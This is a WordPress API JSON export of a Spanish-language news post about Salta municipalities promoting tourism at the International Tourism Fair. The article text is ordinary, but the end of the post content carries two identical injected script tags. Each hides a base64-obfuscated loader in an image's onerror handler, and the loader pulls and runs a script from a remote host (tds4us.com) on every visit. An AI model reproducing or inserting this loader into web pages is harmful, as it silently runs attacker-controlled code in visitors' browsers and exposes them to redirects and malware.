{"id":4462,"date":"2024-10-02T09:31:43","date_gmt":"2024-10-02T12:31:43","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4462"},"modified":"2025-08-13T23:47:48","modified_gmt":"2025-08-14T02:47:48","slug":"municipios-saltenos-invitaron-a-conocer-salta-en-la-feria-internacional-de-turismo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4462","title":{"rendered":"Municipios salte\u00f1os invitaron a conocer Salta en la Feria Internacional de Turismo"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-03918cc65544f43577515063511d8163\" style=\"background-color:#7b0439\"><em>Expusieron ante un interesado p\u00fablico la oferta tur\u00edstica de cada lugar, deslumbraron con sus bellezas naturales y la propuesta cultural y gastron\u00f3mica.<\/em><\/h3>\n\n\n\n<p>En el marco de la&nbsp;<strong>Feria Internacional de Turismo<\/strong>&nbsp;de la que participan las provincias argentinas, diversos pa\u00edses y el sector privado, los municipios de Seclant\u00e1s, San Jos\u00e9 de los Cerrillos, San Carlos, San Antonio de los Cobres, Cafayate, Vaqueros, Tartagal, La Poma y Campo Quijano expusieron ante medios de prensaespecializada y operadores tur\u00edsticos la oferta tur\u00edstica; los asistentes coincidieron en afirmar la importante propuesta.<\/p>\n\n\n\n<p>Asimismo, tambi\u00e9n estan presentes San Ram\u00f3n de la Nueva Or\u00e1n, Iruya, San Lorenzo, Guachipas, ciudad de Salta y Cachi.<\/p>\n\n\n\n<p>De la Feria Internacional participan el ministro de Turismo y Deportes,&nbsp;<strong>Mario Pe\u00f1a<\/strong>&nbsp;y la secretaria de Turismo,&nbsp;<strong>Nadia Loza<\/strong>.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/14180-municipios-saltenios-invitaron-a-conocer-salta-en-la-feria-internacional-de-turismo.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/14180-municipios-saltenios-invitaron-a-conocer-salta-en-la-feria-internacional-de-turismo.jpg\" alt=\"Municipios salte\u00f1os invitaron a conocer Salta en la Feria Internacional de Turismo\" style=\"width:354px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>La Feria Internacional de Turismo que congreg\u00f3 al sector p\u00fablico y privado del Turismo ser\u00e1 el escenario para la presentaci\u00f3n de los municipios salte\u00f1os de las diversas regiones tur\u00edsticas de la Provincia. &nbsp;Es importante destacar que a la Feria asistieron m\u00e1s de 1.700 expositores de todas las provincias argentinas y representaciones de m\u00e1s de 50 pa\u00edses, adem\u00e1s desde la organizaci\u00f3n informaron sobre visitantes r\u00e9cord entre los cuatro d\u00edas de muestra.<\/p>\n\n\n\n<p>As\u00ed, la directora de Turismo de Campo Quijano Valeria Guiti\u00e1n en su exposici\u00f3n expres\u00f3 que Quijano espera a los visitantes los 365 d\u00edas del a\u00f1o para disfrutar, con su naturaleza, la majestuosa Quebrada del Toro, el casco c\u00e9ntrico con m\u00e1s de 100 a\u00f1os de historia; asimismo, se refiri\u00f3 al ramal C14 conocido mundialmente como el Tren a las Nubes, el Museo del Tren y la riqueza gastron\u00f3mica; la funcionaria resalt\u00f3 como un atractivo m\u00e1s la hospitalidad de su gente.<br>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/14181-municipios-saltenios-invitaron-a-conocer-salta-en-la-feria-internacional-de-turismo.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/14181-municipios-saltenios-invitaron-a-conocer-salta-en-la-feria-internacional-de-turismo.jpg\" alt=\"Municipios salte\u00f1os invitaron a conocer Salta en la Feria Internacional de Turismo\" style=\"width:350px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>Por su parte, el secretario de Turismo de Cerrillos, Mat\u00edas Romero destac\u00f3 el orgullo de participar de la Feria y presentar la marca destino y destac\u00f3 que Cerrillos es el coraz\u00f3n de Salta a 15 minutos de la ciudad capital; el funcionario asegur\u00f3 que es tierra de poetas y cantores y capital del Carnaval, actividad para la que ya se iniciaron los preparativos de la 119 edici\u00f3n de los Corsos de Flores. Por otra parte se refiri\u00f3 a algunos de loso m\u00faltiples atractivos de Cerrillos, entre los cuales mencion\u00f3 a Cerdo Negro un emprendimiento \u00fanico en Sudam\u00e9rica que produce jam\u00f3n con las t\u00e9cnicas tradicionales de Espa\u00f1a, entre otros.<\/p>\n\n\n\n<p>El secretario de Turismo de San Antonio de los Cobres, Jaime Soriano resalt\u00f3 que la cultura es la representante del mundo andino, adem\u00e1s, resalt\u00f3 la calidad de la gente y las artesan\u00edas. Por otra parte, se refiri\u00f3 a la importancia de presentar San Antonio de los Cobres en la Feria Internacional de Turismo que permite dialogar con la gente, conocer e intercambiar informaci\u00f3n con los operadores y promover el turismo.<br>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/14182-municipios-saltenios-invitaron-a-conocer-salta-en-la-feria-internacional-de-turismo.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/14182-municipios-saltenios-invitaron-a-conocer-salta-en-la-feria-internacional-de-turismo.jpg\" alt=\"Municipios salte\u00f1os invitaron a conocer Salta en la Feria Internacional de Turismo\" style=\"width:307px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>En tanto, Fernanda Funes, secretaria de Turismo y Cultura de Seclant\u00e1s enfatiz\u00f3 que es la Capital Provincial del Poncho Salte\u00f1o y un Lugar M\u00e1gico ya que conservan sus costumbres ancestrales y se\u00f1al\u00f3 el importante trabajo que se realiza para que Seclant\u00e1s convoque al turismo. Entre los atractivos tur\u00edsticos se refiri\u00f3 al Camino de los Artesanos, cuyo trabajo es conocido a nivel mundial e invit\u00f3 a recorrer el pueblo con sus monumentos y las bellezas naturales.<\/p>\n\n\n\n<p>La secretaria de Cultura y Turismo de Tartagal Claudia S\u00e1nchez manifest\u00f3 la importancia de participar en la FIT por cuanto es una vidriera al mundo y el trabajo que se realiza con diversos sectores para consolidar el destino y se\u00f1al\u00f3 la oportunidad de conversar con agencias de viaje, con el p\u00fablico que tienen inter\u00e9s en diversificar la oferta y conocer el norte; destac\u00f3 entre los diversos atractivos, los carnavales que mixturan los pueblos originarios y la influencia de Bolivia, por otra parte, se\u00f1al\u00f3 que al ser \u00e9ste el a\u00f1o del Centenario de Tartagal hay una nutrida agenda cultural para disfrutar.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente: <a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/municipios-saltenios-invitaron-a-conocer-salta-en-la-feria-internacional-de-turismo-98024\">secretaria de Prensa<\/a><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Expusieron ante un interesado p\u00fablico la oferta tur\u00edstica de cada lugar, deslumbraron con sus bellezas naturales y la propuesta cultural y gastron\u00f3mica. En el marco de la&nbsp;Feria Internacional de Turismo&nbsp;de la que participan las provincias argentinas, diversos pa\u00edses y el sector privado, los municipios de Seclant\u00e1s, San Jos\u00e9 de los Cerrillos, San Carlos, San Antonio [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4463,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-4462","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4462"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4462"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4462\/revisions"}],"predecessor-version":[{"id":6670,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4462\/revisions\/6670"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4463"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4462"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4462"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4462"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}